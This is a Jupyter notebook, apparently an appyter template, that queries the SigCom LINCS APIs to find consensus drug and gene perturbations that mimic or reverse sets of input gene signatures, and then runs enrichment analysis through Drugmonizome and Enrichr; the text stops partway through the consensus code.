"The SigCom LINCS hosts ranked L1000 [1] perturbation signatures from a variety of perturbation types including: drugs and other small molecules, CRISPR knockouts, shRNA knockdowns, and single gene overexpression. SigCom LINCS' RESTful APIs enable querying the signatures programmatically to identify mimickers or reversers for input up and down gene sets. This appyter extends this functionality by enabling analysis for a collection of input signatures to identify consistently reoccuring mimickers and reversers. The appyter takes as input a set of two-sided or one-sided gene sets and constructs a score matrix of mimicking and reversing signatures. From this matrix the appyter computes the consensus. The pipeline also includes (1) Clustergrammer [2] interactive heatmap, and (2) enrichment analysis of the top gene perturbations [3-6] to elucidate the pathways that are being targeted by the consensus perturbagens.",
"_____no_output_____"
]
],
[
[
"import re\nimport math\nimport time\nimport requests\nimport pandas as pd\nimport json\nimport scipy.stats as st\nfrom IPython.display import display, IFrame, Markdown, HTML\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom umap import UMAP\nfrom sklearn.manifold import TSNE\nfrom maayanlab_bioinformatics.normalization import quantile_normalize, zscore_normalize\nfrom maayanlab_bioinformatics.harmonization import ncbi_genes_lookup\nfrom tqdm import tqdm\nimport plotly.express as px\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator",
"_____no_output_____"
],
[
"METADATA_API = \"https://maayanlab.cloud/sigcom-lincs/metadata-api\"\nDATA_API = \"https://maayanlab.cloud/sigcom-lincs/data-api/api/v1\"\nCLUSTERGRAMMER_URL = 'https://maayanlab.cloud/clustergrammer/matrix_upload/'\nS3_PREFIX = \"https://appyters.maayanlab.cloud/storage/LDP3Consensus/\"\ndrugmonizome_meta_api = \"https://maayanlab.cloud/drugmonizome/metadata-api\"\ndrugmonizome_data_api = \"https://maayanlab.cloud/drugmonizome/data-api/api/v1\"\nenrichr_api = 'https://maayanlab.cloud/Enrichr/'",
"_____no_output_____"
],
[
"table = 1\nfigure = 1",
"_____no_output_____"
],
[
"%%appyter code_exec\n\n{% set up_gene_sets = FileField(\n name='up_gene_sets',\n label='Up Gene-sets',\n default='covid19_up.gmt',\n section=\"PRIMARY\",\n examples={\n 'covid19_up.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_up.gmt'\n }\n) %}\n\n{% set down_gene_sets = FileField(\n name='down_gene_sets',\n label='Down Gene-sets',\n default='covid19_down.gmt',\n section=\"PRIMARY\",\n examples={\n 'covid19_down.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_down.gmt'\n }\n) %}\n\n\nup_gene_sets = {{ up_gene_sets }}\ndown_gene_sets = {{ down_gene_sets }}",
"_____no_output_____"
],
[
"gene_set_direction = None\nif up_gene_sets == '':\n gene_set_direction = \"down\"\n print(\"Up gene-sets was not uploaded. Gene-set direction is set to down.\")\nelif down_gene_sets == '':\n gene_set_direction = \"up\"\n print(\"Down gene-sets was not uploaded. Gene-set direction is set to up.\")",
"_____no_output_____"
],
[
"%%appyter code_exec\n\ndatasets = {{ MultiChoiceField(name='datasets',\n label='LINCS Datasets',\n description='Select the LINCS datasets to use for the consensus analysis',\n default=[\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 Chemical Perturbations (2021)\",\n ],\n section = 'ENRICHMENT',\n choices=[\n \"LINCS L1000 Antibody Perturbations (2021)\",\n \"LINCS L1000 Ligand Perturbations (2021)\",\n \"LINCS L1000 Overexpression Perturbations (2021)\",\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 shRNA Perturbations (2021)\",\n \"LINCS L1000 Chemical Perturbations (2021)\",\n \"LINCS L1000 siRNA Perturbations (2021)\",\n ]\n ) \n}}\n\ndrugmonizome_datasets = {{ MultiChoiceField(name='drugmonizome_datasets',\n description='Select the Drugmonizome libraries to use for the enrichment analysis of the consensus drugs',\n label='Drugmonizome Libraries',\n default=[\"L1000FWD_GO_Biological_Processes_drugsetlibrary_up\", \"L1000FWD_GO_Biological_Processes_drugsetlibrary_down\"],\n section = 'ENRICHMENT',\n choices=[\n \"L1000FWD_GO_Biological_Processes_drugsetlibrary_up\",\n \"L1000FWD_GO_Biological_Processes_drugsetlibrary_down\",\n \"L1000FWD_GO_Cellular_Component_drugsetlibrary_up\",\n \"L1000FWD_GO_Cellular_Component_drugsetlibrary_down\",\n \"L1000FWD_GO_Molecular_Function_drugsetlibrary_up\",\n \"L1000FWD_GO_Molecular_Function_drugsetlibrary_down\",\n \"L1000FWD_KEGG_Pathways_drugsetlibrary_up\",\n \"L1000FWD_KEGG_Pathways_drugsetlibrary_down\",\n \"L1000FWD_signature_drugsetlibrary_up\",\n \"L1000FWD_signature_drugsetlibrary_down\",\n \"L1000FWD_predicted_side_effects\",\n \"KinomeScan_kinase_drugsetlibrary\",\n \"Geneshot_associated_drugsetlibrary\",\n \"Geneshot_predicted_generif_drugsetlibrary\",\n \"Geneshot_predicted_coexpression_drugsetlibrary\",\n \"Geneshot_predicted_tagger_drugsetlibrary\",\n \"Geneshot_predicted_autorif_drugsetlibrary\",\n \"Geneshot_predicted_enrichr_drugsetlibrary\",\n \"SIDER_indications_drugsetlibrary\",\n \"SIDER_side_effects_drugsetlibrary\",\n \"DrugRepurposingHub_target_drugsetlibrary\",\n \"ATC_drugsetlibrary\",\n \"Drugbank_smallmolecule_target_drugsetlibrary\",\n \"Drugbank_smallmolecule_enzyme_drugsetlibrary\",\n \"Drugbank_smallmolecule_carrier_drugsetlibrary\",\n \"Drugbank_smallmolecule_transporter_drugsetlibrary\",\n \"STITCH_target_drugsetlibrary\",\n \"PharmGKB_OFFSIDES_side_effects_drugsetlibrary\",\n \"CREEDS_signature_drugsetlibrary_down\",\n \"CREEDS_signature_drugsetlibrary_up\",\n \"RDKIT_maccs_fingerprints_drugsetlibrary\",\n \"DrugCentral_target_drugsetlibrary\",\n \"PubChem_fingerprints_drugsetlibrary\",\n \"DrugRepurposingHub_moa_drugsetlibrary\",\n \"PharmGKB_snp_drugsetlibrary\"\n ]\n ) \n}}\n\ntranscription_libraries = {{ MultiChoiceField(name='transcription_libraries', \n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Transcription Libraries', \n default=[], \n section = 'ENRICHMENT',\n choices=[\n 'ARCHS4_TFs_Coexp',\n 'ChEA_2016',\n 'ENCODE_and_ChEA_Consensus_TFs_from_ChIP-X',\n 'ENCODE_Histone_Modifications_2015',\n 'ENCODE_TF_ChIP-seq_2015',\n 'Epigenomics_Roadmap_HM_ChIP-seq',\n 'Enrichr_Submissions_TF-Gene_Coocurrence',\n 'Genome_Browser_PWMs',\n 'lncHUB_lncRNA_Co-Expression',\n 'miRTarBase_2017',\n 'TargetScan_microRNA_2017',\n 'TF-LOF_Expression_from_GEO',\n 'TF_Perturbations_Followed_by_Expression',\n 'Transcription_Factor_PPIs',\n 'TRANSFAC_and_JASPAR_PWMs',\n 'TRRUST_Transcription_Factors_2019']) \n 
}}\n\n\npathways_libraries = {{ MultiChoiceField(name='pathways_libraries',\n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Pathway Libraries',\n default=[],\n section = 'ENRICHMENT',\n choices=[\n 'ARCHS4_Kinases_Coexp',\n 'BioCarta_2016',\n 'BioPlanet_2019',\n 'BioPlex_2017',\n 'CORUM',\n 'Elsevier_Pathway_Collection',\n 'HMS_LINCS_KinomeScan',\n 'HumanCyc_2016',\n 'huMAP',\n 'KEA_2015',\n 'KEGG_2021_Human',\n 'KEGG_2019_Mouse',\n 'Kinase_Perturbations_from_GEO_down',\n 'Kinase_Perturbations_from_GEO_up',\n 'L1000_Kinase_and_GPCR_Perturbations_down',\n 'L1000_Kinase_and_GPCR_Perturbations_up',\n 'NCI-Nature_2016',\n 'NURSA_Human_Endogenous_Complexome',\n 'Panther_2016',\n 'Phosphatase_Substrates_from_DEPOD',\n 'PPI_Hub_Proteins',\n 'Reactome_2016',\n 'SILAC_Phosphoproteomics',\n 'SubCell_BarCode',\n 'Virus-Host_PPI_P-HIPSTer_2020',\n 'WikiPathway_2021_Human',\n 'WikiPathways_2019_Mouse']) \n }} \n \n \nontologies_libraries = {{ MultiChoiceField(name='ontologies_libraries', \n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Ontology Libraries',\n default=['GO_Biological_Process_2021'],\n section = 'ENRICHMENT',\n choices=[\n 'GO_Biological_Process_2021',\n 'GO_Cellular_Component_2021',\n 'GO_Molecular_Function_2021',\n 'Human_Phenotype_Ontology',\n 'Jensen_COMPARTMENTS',\n 'Jensen_DISEASES',\n 'Jensen_TISSUES',\n 'MGI_Mammalian_Phenotype_Level_4_2021']) \n }} \n\n \ndiseases_drugs_libraries = {{ MultiChoiceField(name='diseases_drugs_libraries',\n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Disease/Drug Libraries',\n default=[],\n section = 'ENRICHMENT',\n choices=[ \n 'Achilles_fitness_decrease',\n 'Achilles_fitness_increase',\n 'ARCHS4_IDG_Coexp',\n 'ClinVar_2019',\n 'dbGaP',\n 'DepMap_WG_CRISPR_Screens_Broad_CellLines_2019',\n 'DepMap_WG_CRISPR_Screens_Sanger_CellLines_2019',\n 'DisGeNET',\n 'DrugMatrix',\n 'DSigDB',\n 'GeneSigDB',\n 'GWAS_Catalog_2019',\n 'LINCS_L1000_Chem_Pert_down',\n 'LINCS_L1000_Chem_Pert_up',\n 'LINCS_L1000_Ligand_Perturbations_down',\n 'LINCS_L1000_Ligand_Perturbations_up',\n 'MSigDB_Computational',\n 'MSigDB_Oncogenic_Signatures',\n 'Old_CMAP_down',\n 'Old_CMAP_up',\n 'OMIM_Disease',\n 'OMIM_Expanded',\n 'PheWeb_2019',\n 'Rare_Diseases_AutoRIF_ARCHS4_Predictions',\n 'Rare_Diseases_AutoRIF_Gene_Lists',\n 'Rare_Diseases_GeneRIF_ARCHS4_Predictions',\n 'Rare_Diseases_GeneRIF_Gene_Lists',\n 'UK_Biobank_GWAS_v1',\n 'Virus_Perturbations_from_GEO_down',\n 'Virus_Perturbations_from_GEO_up',\n 'VirusMINT']) \n }}",
"_____no_output_____"
],
[
"%%appyter code_exec\nalpha = {{FloatField(name='alpha', label='p-value cutoff', default=0.05, section='PARAMETER')}}\nmin_sigs = {{IntField(name='min_sigs',\n label='min_sigs',\n description='Minimum number of input gene sets that has the same hit required to consider it as a consensus signature',\n default=2, section='PARAMETER')}}\ntop_perts = {{IntField(name='top_perts', label='top signatures', default=100, section='PARAMETER')}}\nconsensus_method = {{ ChoiceField(\n name='consensus_method',\n label='consensus method',\n description='Please select a method for getting the consensus',\n default='z-score',\n choices={\n 'z-score': \"'z-score'\",\n 'top count': \"'count'\",\n },\n section='PARAMETER') }}\n",
"_____no_output_____"
]
],
[
[
"## Gene Harmonization\nTo ensure that the gene names are consistent throughout the analysis, the input gene sets are harmonized to NCBI Gene symbols [7-8] using an [in-house gene harmonization module](https://github.com/MaayanLab/maayanlab-bioinformatics).",
"_____no_output_____"
]
],
[
[
"ncbi_lookup = ncbi_genes_lookup('Mammalia/Homo_sapiens')\nprint('Loaded NCBI genes!')",
"_____no_output_____"
],
[
"signatures = {}\nif not up_gene_sets == '':\n with open(up_gene_sets) as upfile:\n for line in upfile:\n unpacked = line.strip().split(\"\\t\")\n if len(unpacked) < 3:\n raise ValueError(\"GMT is not formatted properly, please consult the README of the appyter for proper formatting\")\n sigid = unpacked[0]\n geneset = unpacked[2:]\n genes = []\n for i in geneset:\n gene = i.split(\",\")[0]\n gene_name = ncbi_lookup(gene.upper())\n if gene_name:\n genes.append(gene_name)\n signatures[sigid] = {\n \"up_genes\": genes,\n \"down_genes\": []\n }\nif not down_gene_sets == '':\n with open(down_gene_sets) as downfile:\n for line in downfile:\n unpacked = line.strip().split(\"\\t\")\n if len(unpacked) < 3:\n raise ValueError(\"GMT is not formatted properly, please consult the README of the appyter for proper formatting\")\n sigid = unpacked[0]\n geneset = unpacked[2:]\n if sigid not in signatures and gene_set_direction == None:\n raise ValueError(\"%s did not match any of the up signatures, make sure that the signature names are the same for both up and down genes\"%sigid)\n else:\n genes = []\n for i in geneset:\n gene = i.split(\",\")[0]\n gene_name = ncbi_lookup(gene)\n if gene_name:\n genes.append(gene_name)\n if sigid in signatures:\n signatures[sigid][\"down_genes\"] = genes\n else:\n signatures[sigid] = {\n \"up_genes\": [],\n \"down_genes\": genes\n }",
"_____no_output_____"
]
],
[
[
"## Input Signatures Metadata",
"_____no_output_____"
]
],
[
[
"enrichr_libraries = transcription_libraries + pathways_libraries + ontologies_libraries + diseases_drugs_libraries",
"_____no_output_____"
],
[
"dataset_map = {\n \"LINCS L1000 Antibody Perturbations (2021)\": \"l1000_aby\",\n \"LINCS L1000 Ligand Perturbations (2021)\": \"l1000_lig\",\n \"LINCS L1000 Overexpression Perturbations (2021)\": \"l1000_oe\",\n \"LINCS L1000 CRISPR Perturbations (2021)\": \"l1000_xpr\",\n \"LINCS L1000 shRNA Perturbations (2021)\": \"l1000_shRNA\",\n \"LINCS L1000 Chemical Perturbations (2021)\": \"l1000_cp\",\n \"LINCS L1000 siRNA Perturbations (2021)\": \"l1000_siRNA\"\n}\n\nlabeller = {\n \"LINCS L1000 Antibody Perturbations (2021)\": \"antibody\",\n \"LINCS L1000 Ligand Perturbations (2021)\": \"ligand\",\n \"LINCS L1000 Overexpression Perturbations (2021)\": \"overexpression\",\n \"LINCS L1000 CRISPR Perturbations (2021)\": \"CRISPR\",\n \"LINCS L1000 shRNA Perturbations (2021)\": \"shRNA\",\n \"LINCS L1000 Chemical Perturbations (2021)\": \"chemical\",\n \"LINCS L1000 siRNA Perturbations (2021)\": \"siRNA\"\n}\n\ngene_page = {\n \"LINCS L1000 Ligand Perturbations (2021)\",\n \"LINCS L1000 Overexpression Perturbations (2021)\",\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 shRNA Perturbations (2021)\",\n \"LINCS L1000 siRNA Perturbations (2021)\"\n}\n\ndrug_page = {\n \"LINCS L1000 Chemical Perturbations (2021)\": \"l1000_cp\",\n}",
"_____no_output_____"
]
],
[
[
"## SigCom LINCS Signature Search\nSigCom LINCS provides RESTful APIs to perform rank enrichment analysis on two-sided (up and down) gene-sets or one-sided (up-only, down-only) gene sets to get mimicking and reversing signatures that are ranked by z-score (one-sided gene-sets) or z-sum (absolute value sum of the z-scores of the up and down gene-sets for two-sided analysis).",
"_____no_output_____"
]
],
[
[
"# functions\ndef convert_genes(up_genes=[], down_genes=[]):\n try:\n payload = {\n \"filter\": {\n \"where\": {\n \"meta.symbol\": {\"inq\": up_genes + down_genes}\n }\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/entities/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n up = set(up_genes)\n down = set(down_genes)\n if len(up_genes) == 0 or len(down_genes) == 0:\n converted = {\n \"entities\": [],\n }\n else:\n converted = {\n \"up_entities\": [],\n \"down_entities\": []\n }\n for i in results:\n symbol = i[\"meta\"][\"symbol\"]\n if \"entities\" in converted:\n converted[\"entities\"].append(i[\"id\"])\n elif symbol in up:\n converted[\"up_entities\"].append(i[\"id\"])\n elif symbol in down:\n converted[\"down_entities\"].append(i[\"id\"])\n return converted\n except Exception as e:\n print(e)\n\n\ndef signature_search(genes, library):\n try:\n payload = {\n **genes,\n \"database\": library,\n \"limit\": 500,\n }\n timeout = 0.5\n for i in range(5):\n endpoint = \"/enrich/rank\" if \"entities\" in payload else \"/enrich/ranktwosided\"\n res = requests.post(DATA_API + endpoint, json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n \n return res.json()[\"results\"]\n except Exception as e:\n print(e)\n\ndef resolve_rank(s, gene_set_direction):\n try:\n sigs = {}\n for i in s:\n if i[\"p-value\"] < alpha:\n uid = i[\"uuid\"]\n direction = \"up\" if i[\"zscore\"] > 0 else \"down\"\n if direction == gene_set_direction:\n i[\"type\"] = \"mimicker\"\n sigs[uid] = i\n else:\n i[\"type\"] = \"reverser\"\n sigs[uid] = i\n \n payload = {\n \"filter\": {\n \"where\": {\n \"id\": {\"inq\": list(sigs.keys())}\n },\n \"fields\": [\n \"id\",\n \"meta.pert_name\",\n \"meta.pert_type\",\n \"meta.pert_time\",\n \"meta.pert_dose\",\n \"meta.cell_line\",\n \"meta.local_id\"\n ]\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/signatures/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n signatures = {\n \"mimickers\": {},\n \"reversers\": {}\n }\n for sig in results:\n uid = sig[\"id\"]\n scores = sigs[uid]\n sig[\"scores\"] = scores\n if \"pert_name\" in sig[\"meta\"]:\n local_id = sig[\"meta\"].get(\"local_id\", None)\n if scores[\"type\"] == \"mimicker\":\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"mimickers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-score\": abs(scores.get(\"zscore\", 0)),\n \"p-value\": scores.get(\"p-value\", 0)\n }\n elif scores[\"type\"] == \"reverser\":\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"reversers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": 
sig[\"meta\"].get(\"cell_line\", None),\n \"z-score\": abs(scores.get(\"zscore\", 0)),\n \"p-value\": scores.get(\"p-value\", 0)\n }\n return signatures\n\n except Exception as e:\n print(e)\n\n\ndef resolve_ranktwosided(s):\n try:\n sigs = {}\n for i in s:\n if i['p-down'] < alpha and i['p-up'] < alpha:\n uid = i[\"uuid\"]\n i['z-sum (abs)'] = abs(i['z-sum'])\n if i['z-sum'] > 0:\n i[\"type\"] = \"mimicker\"\n sigs[uid] = i\n elif i['z-sum'] < 0:\n i[\"type\"] = \"reverser\"\n sigs[uid] = i\n \n payload = {\n \"filter\": {\n \"where\": {\n \"id\": {\"inq\": list(sigs.keys())}\n },\n \"fields\": [\n \"id\",\n \"meta.pert_name\",\n \"meta.pert_type\",\n \"meta.pert_time\",\n \"meta.pert_dose\",\n \"meta.cell_line\",\n \"meta.local_id\"\n ]\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/signatures/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n signatures = {\n \"mimickers\": {},\n \"reversers\": {}\n }\n for sig in results:\n uid = sig[\"id\"]\n scores = sigs[uid]\n sig[\"scores\"] = scores\n if \"pert_name\" in sig[\"meta\"]:\n local_id = sig[\"meta\"].get(\"local_id\", None)\n if scores[\"type\"] == \"mimicker\" and len(signatures[\"mimickers\"]) < 100:\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"mimickers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-sum\": scores.get(\"z-sum (abs)\", 0)\n }\n elif scores[\"type\"] == \"reverser\" and len(signatures[\"reversers\"]) < 100:\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"reversers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-sum\": scores.get(\"z-sum (abs)\", 0)\n }\n return signatures\n\n except Exception as e:\n print(e)",
"_____no_output_____"
],
[
"# enriched = {lib:{\"mimickers\": {}, \"reversers\": {}} for lib in datasets}\nenriched = {\"mimickers\": {lib: {} for lib in datasets}, \"reversers\": {lib: {} for lib in datasets}}\nmetadata = {}\nfor k,sig in tqdm(signatures.items()): \n try:\n time.sleep(0.1)\n genes = convert_genes(sig[\"up_genes\"],sig[\"down_genes\"])\n if (\"entities\" in genes and len(genes[\"entities\"]) > 5) or (len(genes[\"up_entities\"]) > 5 and len(genes[\"down_entities\"]) > 5):\n for lib in datasets:\n library = dataset_map[lib]\n s = signature_search(genes, library)\n if gene_set_direction == None:\n sigs = resolve_ranktwosided(s)\n else:\n sigs = resolve_rank(s, gene_set_direction)\n enriched[\"mimickers\"][lib][k] = sigs[\"mimickers\"]\n enriched[\"reversers\"][lib][k] = sigs[\"reversers\"]\n for direction, entries in sigs.items():\n for label, meta in entries.items():\n if label not in metadata:\n metadata[label] = {\n \"pert_name\": meta.get(\"pert_name\", None),\n \"pert_time\": meta.get(\"pert_time\", None),\n \"pert_dose\": meta.get(\"pert_dose\", None),\n \"cell_line\": meta.get(\"cell_line\", None),\n }\n time.sleep(0.1)\n except Exception as e:\n print(e)",
"_____no_output_____"
],
[
"def clustergrammer(df, name, figure, label=\"Clustergrammer\"):\n clustergram_df = df.rename(columns={i:\"Signature: %s\"%i for i in df.columns}, index={i:\"Drug: %s\"%i for i in df.index})\n clustergram_df.to_csv(name, sep=\"\\t\")\n response = ''\n timeout = 0.5\n for i in range(5):\n try:\n res = requests.post(CLUSTERGRAMMER_URL, files={'file': open(name, 'rb')})\n if not res.ok:\n response = res.text\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n clustergrammer_url = res.text.replace(\"http:\",\"https:\") \n break\n except Exception as e:\n response = e\n time.sleep(2)\n else:\n if type(response) == Exception:\n raise response\n else:\n raise Exception(response)\n display(IFrame(clustergrammer_url, width=\"1000\", height=\"1000\"))\n display(Markdown(\"**Figure %d** %s [Go to url](%s)\"%(figure, label, clustergrammer_url)))\n figure += 1\n return figure\n\ncmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=1, dark=0)\n\ndef heatmap(df, filename, figure, label, width=15, height=15):\n fig = plt.figure(figsize=(width,height))\n cg = sns.clustermap(df, cmap=cmap, figsize=(width, height))\n cg.ax_row_dendrogram.set_visible(False)\n cg.ax_col_dendrogram.set_visible(False)\n display(cg)\n plt.show()\n cg.savefig(filename)\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure+=1\n return figure\n\ndef make_clickable(link):\n # target _blank to open new window\n # extract clickable text to display for your link\n text = link.split('=')[1]\n return f'<a target=\"_blank\" href=\"{link}\">{text}</a>'\n\n\nannot_dict = {}\ndef bar_chart(enrichment, title=''):\n bar_color = 'mediumspringgreen'\n bar_color_not_sig = 'lightgrey'\n edgecolor=None\n linewidth=0\n if len(enrichment) > 10:\n enrichment = enrichment[0:10]\n enrichment_names = [i[\"name\"] for i in enrichment]\n enrichment_scores = [i[\"pval\"] for i in enrichment]\n plt.figure(figsize=(10,4))\n bar_colors = [bar_color if (x < 0.05) else bar_color_not_sig for x in enrichment_scores]\n fig = sns.barplot(x=np.log10(enrichment_scores)*-1, y=enrichment_names, palette=bar_colors, edgecolor=edgecolor, linewidth=linewidth)\n fig.axes.get_yaxis().set_visible(False)\n fig.set_title(title.replace('_',' '),fontsize=20)\n fig.set_xlabel('-Log10(p-value)',fontsize=19)\n fig.xaxis.set_major_locator(MaxNLocator(integer=True))\n fig.tick_params(axis='x', which='major', labelsize=20)\n if max(np.log10(enrichment_scores)*-1)<1:\n fig.xaxis.set_ticks(np.arange(0, max(np.log10(enrichment_scores)*-1), 0.1))\n for ii,annot in enumerate(enrichment_names):\n if annot in annot_dict.keys():\n annot = annot_dict[annot]\n if enrichment_scores[ii] < 0.05:\n annot = ' *'.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))]) \n else:\n annot = ' '.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])\n\n title_start= max(fig.axes.get_xlim())/200\n fig.text(title_start,ii,annot,ha='left',wrap = True, fontsize = 12)\n fig.patch.set_edgecolor('black') \n fig.patch.set_linewidth('2')\n plt.show()\n \n\ndef get_drugmonizome_plot(consensus, label, figure, dataset):\n payload = {\n \"filter\":{\n \"where\": {\n \"meta.Name\": {\n \"inq\": [i.lower() for i in set(consensus['pert name'])]\n }\n }\n }\n }\n\n res = requests.post(drugmonizome_meta_api + \"/entities/find\", json=payload)\n\n entities = {}\n for i in res.json():\n name = i[\"meta\"][\"Name\"]\n uid = i[\"id\"]\n if name not in entities:\n entities[name] = uid\n \n query = {\n \"entities\": 
list(entities.values()),\n \"limit\": 1000,\n \"database\": dataset\n }\n\n res = requests.post(drugmonizome_data_api + \"/enrich/overlap\", json=query)\n\n scores = res.json()[\"results\"]\n uids = {i[\"uuid\"]: i for i in scores}\n\n payload = {\n \"filter\":{\n \"where\": {\n \"id\": {\n \"inq\": list(uids.keys())\n }\n }\n }\n }\n\n res = requests.post(drugmonizome_meta_api + \"/signatures/find\", json=payload)\n\n sigs = res.json()\n sigs = res.json()\n scores = []\n for i in sigs:\n score = uids[i[\"id\"]]\n scores.append({\n \"name\": i[\"meta\"][\"Term\"][0][\"Name\"],\n \"pval\": score[\"p-value\"]\n })\n \n scores.sort(key=lambda x: x['pval'])\n if len(scores) > 0:\n bar_chart(scores, dataset.replace(\"setlibrary\", \" set library\"))\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure += 1\n return figure\n\ndef get_enrichr_bar(userListId, enrichr_library, figure, label):\n query_string = '?userListId=%s&backgroundType=%s'\n res = requests.get(\n enrichr_api + 'enrich' + query_string % (userListId, enrichr_library)\n )\n if not res.ok:\n raise Exception('Error fetching enrichment results')\n\n data = res.json()[enrichr_library]\n scores = [{\"name\": i[1], \"pval\": i[2]} for i in data]\n scores.sort(key=lambda x: x['pval'])\n if len(scores) > 0:\n bar_chart(scores, enrichr_library)\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure +=1\n return figure\n\ndef enrichment(consensus, label, figure):\n gene_names = [i.upper() for i in set(consensus['pert name'])]\n genes_str = '\\n'.join(gene_names)\n description = label\n payload = {\n 'list': (None, genes_str),\n 'description': (None, description)\n }\n\n res = requests.post(enrichr_api + 'addList', files=payload)\n if not res.ok:\n raise Exception('Error analyzing gene list')\n\n data = res.json()\n shortId = data[\"shortId\"]\n userListId = data[\"userListId\"]\n display(Markdown(\"Enrichr Link: https://maayanlab.cloud/Enrichr/enrich?dataset=%s\"%shortId))\n for d in enrichr_libraries:\n l = \"Enrichr %s top ranked terms for %s\"%(d.replace(\"_\", \" \"), label)\n figure = get_enrichr_bar(userListId, d, figure, l)\n return figure",
"_____no_output_____"
]
],
[
[
"## Consensus Analysis\nMimicking and reversing perturbagen scores are organized into a matrix. Depending on the consensus method chosen by the user, the consensus signatures are computed either by ranking the sum of z-scores or z-sum; or by counts.\n\n\n### Mimickers",
"_____no_output_____"
]
],
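To make the two consensus options concrete, here is a minimal, self-contained sketch (using a made-up score matrix, not results from this analysis) of how perturbagens are filtered by `min_sigs` and then ranked either by summed scores (`'z-score'`) or by hit counts (`'count'`), mirroring the logic in the cells below:

```python
import pandas as pd

# Hypothetical perturbagen-by-input-signature score matrix (absolute z-scores/z-sums; 0 = no hit)
df = pd.DataFrame(
    {"sig_A": [2.5, 0.0, 1.1], "sig_B": [1.8, 3.0, 1.2], "sig_C": [0.0, 2.7, 1.0]},
    index=["pert_1", "pert_2", "pert_3"],
)

min_sigs = 2
df = df[(df > 0).sum(1) >= min_sigs]  # keep perturbagens hit in at least min_sigs input signatures

by_zscore = df.sum(1).sort_values(ascending=False)       # consensus_method == 'z-score'
by_count = (df > 0).sum(1).sort_values(ascending=False)  # consensus_method == 'count'
print(by_zscore)
print(by_count)
```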
[
[
"score_field = \"z-sum\" if gene_set_direction == None else \"z-score\"\ntop_n_signatures = 100",
"_____no_output_____"
],
[
"direction = \"mimickers\"\nalternate = \"mimicking\"\nfor lib in datasets:\n library = dataset_map[lib]\n display(Markdown(\"#### Consensus %s %s signatures\"%(alternate, labeller[lib])), display_id=alternate+lib)\n index = set()\n sig_dict = enriched[direction][lib]\n for v in sig_dict.values():\n index = index.union(v.keys())\n df = pd.DataFrame(0, index=index, columns=sig_dict.keys())\n for sig_name,v in sig_dict.items():\n for local_id, meta in v.items():\n df.at[local_id, sig_name] = meta[score_field]\n filename = \"sig_matrix_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n df.to_csv(filename, sep=\"\\t\")\n display(Markdown(\"Download score matrix for %s %s signatures ([download](./%s))\"%\n (alternate, labeller[lib], filename)))\n if len(df.index) > 1 and len(df.columns) > 1:\n top_index = df.index\n if len(top_index) > top_n_signatures:\n top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index\n top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]\n if 